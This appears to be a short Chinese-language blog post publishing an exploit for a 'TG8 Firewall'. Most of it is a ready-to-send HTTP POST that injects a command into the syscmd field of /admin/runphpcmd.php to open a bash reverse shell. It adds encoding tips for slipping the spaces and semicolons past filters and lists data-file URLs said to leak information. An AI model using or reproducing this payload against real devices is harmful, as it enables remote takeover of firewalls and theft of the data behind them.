# TG8 Firewall RCE&信息洩露漏洞
==Payload==
POST /admin/runphpcmd.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 68 Connection: keep-alive syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bbash%2F-i%2F>&%2F/dev/tcp/127.0.0.1/10086%2F0>&1%3B++local
空格用%2f替換,‘;’用%3B替換
==信息泄露==
http://127.0.0.1/data/w-341.tg http://127.0.0.1/data/w-342.tg http://127.0.0.1/data/r-341.tg http://127.0.0.1/data/r-342.tg
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容